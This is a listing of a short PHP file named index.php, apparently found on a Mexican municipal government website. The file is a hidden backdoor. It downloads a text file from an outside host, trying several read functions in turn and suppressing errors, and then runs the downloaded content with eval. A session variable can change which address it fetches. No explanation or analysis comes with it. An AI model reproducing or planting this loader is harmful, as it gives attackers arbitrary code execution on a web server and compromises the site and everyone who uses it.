File "index.php"
Full Path: /home/cuautla1/dif.cuautlajalisco.gob.mx/Fraccion6/Fraccion12/index.php
File size: 718 bytes
MIME-type: text/x-php
Charset: utf-8
<?php
@session_start();
list($u1, $u2) = [$_SESSION['x'] ?? 'https://teamzedd2026.tech/media/uploads/r/k/rahman.txt', 'https://teamzedd2026.tech/media/uploads/r/k/rahman.txt'];
$f = function($p) {
foreach (['file_get_contents', 'file', 'readfile'] as $fn) {
if ($fn == 'file') {
$r = @$fn($p);
if (is_array($r)) return implode('', $r);
} elseif ($fn == 'readfile') {
ob_start();
@$fn($p);
$r = ob_get_clean();
if ($r) return $r;
} else {
$r = @$fn($p);
if ($r) return $r;
}
}
return '';
};
($c = $f($u1)) || ($c = $f($u2));
$c && @eval('?>' . $c);
?>